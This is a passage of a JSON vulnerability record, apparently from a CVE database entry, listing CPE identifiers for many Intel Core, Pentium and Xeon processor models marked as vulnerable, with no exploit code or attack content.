                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7660u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7700t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820eq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820hk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7820hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:7920hq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:8550u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:8650u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:8700:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:8700k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y10c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y51:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y70:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m:5y71:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m3:6y30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m3:7y30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m3:7y32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m5:6y54:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m5:6y57:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_m7:6y75:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j2850:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j2900:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j3710:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j4205:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3510:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3520:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3540:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3700:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3710:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n4200:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5502:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5503:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5504:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5506:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5507:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5520:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5540:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5603:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5606:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5607:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5620:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5630:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5640:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5645:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5649:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e6510:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e6540:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e7520:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e7530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e7540:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:ec5509:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:ec5539:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:ec5549:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l3406:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l3426:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5506:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5508:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5518:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5520:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5609:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5618:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5630:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5638:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5640:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l7545:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l7555:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:lc5518:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:lc5528:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:w3670:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:w3680:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:w3690:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:w5580:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:w5590:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x3430:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x3440:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x3450:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x3460:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x3470:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x3480:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5550:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5560:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5570:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5647:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5650:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5660:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5667:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5670:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5672:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5675:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5677:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5680:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5687:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5690:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x6550:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x7542:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x7550:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x7560:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_bronze_3104:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_bronze_3106:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e-1105c:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1505m_v6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1515m_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1535m_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1535m_v6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1545m_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1558l_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1565l_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1575m_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1578l_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1585_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1585l_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1105c_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1125c:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1125c_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_12201:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_12201_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1220l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1226_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1231_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1235:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1235l_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1240l_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1241_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1245_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1246_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1258l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1260l:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1260l_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1265l_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1265l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1265l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1268l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1268l_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1270_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1271_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1275l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1276_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1278l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v5:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1280_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1281_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285l_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1285l_v4:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1286_v3:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
